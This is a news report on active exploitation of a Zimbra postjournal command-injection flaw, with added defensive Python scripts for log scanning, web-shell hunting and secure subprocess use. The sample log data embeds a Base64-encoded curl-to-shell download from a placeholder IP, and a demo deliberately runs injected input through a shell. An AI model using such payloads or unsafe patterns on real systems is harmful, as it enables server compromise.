Security researchers are warning of active exploitation of a recently disclosed vulnerability in Synacor's Zimbra Collaboration software. Enterprise security firm Proofpoint observed malicious activity targeting the flaw beginning on September 28, 2024. The vulnerability, tracked as CVE-2024-45519, is a critical issue in Zimbra's postjournal service that allows unauthenticated remote attackers to execute arbitrary commands on affected installations.
The attacks use spoofed Gmail messages whose CC fields contain fabricated addresses; a vulnerable Zimbra server hands these addresses to postjournal, which parses and executes them as shell commands. According to Proofpoint, the addresses carry Base64-encoded strings that are decoded and run with the sh utility. In MITRE ATT&CK terms this is initial access through exploitation of a public-facing application (T1190) followed by command execution via the Unix shell (T1059.004).
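A detection pass over mail logs is the practical takeaway from this paragraph: recipient addresses that contain shell metacharacters or long Base64 runs are what the campaign looks like on the wire. The script below is an added example, not code from Proofpoint or Zimbra. It runs over constructed Postfix-style `to=<...>` lines (the payload in the second line is hypothetical and the decoded command is a placeholder URL), and the Base64 heuristic is an assumption about payload shape, not a signature published by anyone.

```python
import base64
import binascii
import re

# Constructed sample lines in a Postfix-style "to=<address>" format. They are
# illustrative stand-ins, not log lines captured from the real campaign; the
# second carries a hypothetical shell payload inside a quoted local part.
SAMPLE_LOG_LINES = [
    'Sep 28 03:12:01 mail postfix/smtpd[1234]: to=<alice@example.com>',
    'Sep 28 03:12:03 mail postfix/smtpd[1234]: to=<"aabbb$(echo${IFS}'
    'Y3VybCBodHRwOi8vMTk4LjUxLjEwMC4xL3guc2ggfCBzaA==|base64${IFS}-d|sh)"@mail.example.com>',
    'Sep 28 03:12:05 mail postfix/smtpd[1234]: to=<"a`id`b"@mail.example.com>',
    'Sep 28 03:12:07 mail postfix/smtpd[1234]: to=<bob.smith+tag@example.com>',
]

RECIPIENT_RE = re.compile(r'to=<([^>]*)>')
# Characters that make a local part executable once it reaches sh.
SHELL_META_RE = re.compile(r'\$\(|\$\{|`|[|;&]')
# Runs long enough to be a Base64 blob rather than an ordinary local part
# (heuristic threshold, an assumption of this example).
B64_RUN_RE = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')


def decode_base64_runs(text):
    """Return every Base64 run in text that decodes to printable UTF-8."""
    decoded = []
    for match in B64_RUN_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            as_text = raw.decode('utf-8')
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if as_text and all(ch.isprintable() or ch in '\n\t' for ch in as_text):
            decoded.append(as_text)
    return decoded


def analyse_recipient(address):
    """Score one recipient address; returns a dict with the reasons it tripped."""
    reasons = []
    if SHELL_META_RE.search(address):
        reasons.append('shell metacharacters in address')
    decoded = decode_base64_runs(address)
    if decoded:
        reasons.append('embedded Base64 decodes to text')
    return {'address': address, 'suspicious': bool(reasons),
            'reasons': reasons, 'decoded': decoded}


def scan_log(lines):
    """Walk log lines and return the analysis for every suspicious recipient."""
    findings = []
    for line in lines:
        for address in RECIPIENT_RE.findall(line):
            result = analyse_recipient(address)
            if result['suspicious']:
                findings.append(result)
    return findings


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG_LINES):
        print(finding['address'])
        for reason in finding['reasons']:
            print('  -', reason)
        for command in finding['decoded']:
            print('  decoded:', command)
```

Quoted local parts are legal in SMTP, so the metacharacter check is what carries the signal; the Base64 decode is there to surface the actual command for triage rather than to decide on its own.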
Zimbra fixed the flaw on September 4, 2024 in several releases, including 8.8.15 Patch 46 and 10.1.1. Security researcher Alan Li, known in the community as lebr0nli, discovered and reported the vulnerability. Although the postjournal feature is optional, Synacor urges all customers to apply the patches to close off exploitation.
For instances where postjournal is not in use and patching cannot happen immediately, Synacor recommends removing the postjournal binary as a temporary measure. This stopgap applies only where the feature is already disabled, reduces exposure while a patch is pending, and is not a substitute for updating.
Proofpoint identified specific addresses which, once decoded, attempt to write a web shell to a directory under Zimbra's administrative web interface. The web shell listens for incoming connections, checks the JSESSIONID cookie on each request, and executes Base64-encoded commands supplied in a JACTION cookie. The activity has not yet been attributed to a known threat actor or group.
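Two things follow from the web shell description for anyone hunting on a Zimbra host: requests carrying a JACTION cookie are worth decoding, and JSP files recently written under the admin webapp deserve a look. The script below is an added example, not Proofpoint's or Zimbra's code. The requests are constructed (path and cookie values are hypothetical), and the default admin webapp directory `/opt/zimbra/jetty_base/webapps/zimbraAdmin` is an assumption about a standard install; pass your own path if it differs.

```python
import base64
import binascii
import os
import sys
import time

# Assumed location of the admin webapp on a standard Zimbra install.
DEFAULT_ADMIN_WEBAPP = '/opt/zimbra/jetty_base/webapps/zimbraAdmin'

# Constructed requests, as a hunter might reconstruct them from a capture or
# a request log that records cookies. The second mimics the traffic pattern
# described for the web shell: a JSESSIONID cookie plus a JACTION cookie
# carrying a Base64-encoded command. Paths and values are hypothetical.
SAMPLE_REQUESTS = [
    {'method': 'GET', 'path': '/zimbraAdmin/',
     'headers': {'Cookie': 'JSESSIONID=1a2b3c4d5e6f'}},
    {'method': 'POST', 'path': '/zimbraAdmin/public/jsp/example.jsp',
     'headers': {'Cookie': 'JSESSIONID=1a2b3c4d5e6f; JACTION=aWQ7IHVuYW1lIC1h'}},
]


def parse_cookies(header):
    """Split a Cookie header into a dict; a value may itself contain '='."""
    cookies = {}
    for part in header.split(';'):
        name, sep, value = part.strip().partition('=')
        if sep:
            cookies[name] = value
    return cookies


def inspect_request(request):
    """Return a finding if the request carries a JACTION cookie, else None."""
    cookies = parse_cookies(request['headers'].get('Cookie', ''))
    if 'JACTION' not in cookies:
        return None
    try:
        command = base64.b64decode(cookies['JACTION'], validate=True).decode('utf-8')
    except (binascii.Error, UnicodeDecodeError):
        command = None  # present but not decodable: still worth a look
    return {'path': request['path'],
            'has_jsessionid': 'JSESSIONID' in cookies,
            'decoded_command': command}


def find_recent_jsp(webapp_dir, since_epoch):
    """List .jsp files under webapp_dir modified after since_epoch (UTC seconds)."""
    hits = []
    for root, _dirs, files in os.walk(webapp_dir):
        for name in files:
            if name.lower().endswith('.jsp'):
                full = os.path.join(root, name)
                if os.path.getmtime(full) > since_epoch:
                    hits.append(os.path.relpath(full, webapp_dir))
    return sorted(hits)


if __name__ == '__main__':
    for req in SAMPLE_REQUESTS:
        finding = inspect_request(req)
        if finding:
            print('JACTION request:', finding)
    webapp = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_ADMIN_WEBAPP
    if os.path.isdir(webapp):
        # Anything written in the last 30 days is a candidate drop.
        for rel in find_recent_jsp(webapp, time.time() - 30 * 86400):
            print('recent JSP:', rel)
```

Base64 cookie values legitimately end in `=`, which is why the cookie parser partitions on the first `=` only instead of splitting.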
Exploitation surged shortly after ProjectDiscovery published technical details about the vulnerability. The root cause is unsanitized user input processed by the postjournal binary, which permits arbitrary command injection. Because the injection point is a recipient address, an attacker needs only to deliver a crafted SMTP message to a vulnerable server to run commands on it; no authentication is involved.
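The flaw class here is ordinary command injection: attacker-controlled text reaches a shell as part of a command line. The following is an added illustration of that pattern and its fix, not Zimbra's code (postjournal is a native binary; this Python model stands in for it). The constructed `INJECTION_ADDRESS` uses a harmless `echo` marker, and the address allow-list is an assumption about what a journaling stage should accept, not Zimbra's actual validation.

```python
import re
import subprocess

# Conservative allow-list for addresses this stage is willing to handle.
# Anything outside it is rejected before any subprocess is started.
ADDRESS_RE = re.compile(r'^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$')

# Constructed payload: a legal-looking quoted local part carrying a command
# substitution. The inner command is a harmless echo marker.
INJECTION_ADDRESS = '"a$(echo INJECTED)b"@example.com'


def journal_recipient_unsafe(address):
    """Vulnerable pattern: the address is spliced into a command line that a
    shell interprets, so the $(...) inside it is expanded and executed."""
    cmd = 'echo recipient ' + address
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True).stdout.strip()


def journal_recipient_argv(address):
    """Partial fix: no shell, so the address is one literal argv element.
    The payload is not executed, but unvalidated data still flows onward."""
    return subprocess.run(['echo', 'recipient', address], capture_output=True,
                          text=True).stdout.strip()


def journal_recipient_safe(address):
    """Hardened pattern: validate against the allow-list, then pass argv only."""
    if not ADDRESS_RE.fullmatch(address):
        raise ValueError('rejected recipient address: %r' % address)
    return journal_recipient_argv(address)


if __name__ == '__main__':
    print('unsafe :', journal_recipient_unsafe(INJECTION_ADDRESS))
    print('argv   :', journal_recipient_argv(INJECTION_ADDRESS))
    try:
        journal_recipient_safe(INJECTION_ADDRESS)
    except ValueError as exc:
        print('safe   :', exc)
```

Running the unsafe variant shows `INJECTED` substituted into the output, which is the whole vulnerability in miniature; the argv variant prints the payload verbatim, and the validated variant never reaches a subprocess at all.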
In response to the active exploitation, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-45519 to its Known Exploited Vulnerabilities catalog on October 3, 2024. The listing requires Federal Civilian Executive Branch agencies to remediate the flaw by October 24, 2024.
Given the ongoing exploitation, administrators should apply the latest patches without delay and, where postjournal is not needed, remove the binary in the meantime. A successful attack yields command execution on the mail server itself, putting both service availability and the mail it holds at risk.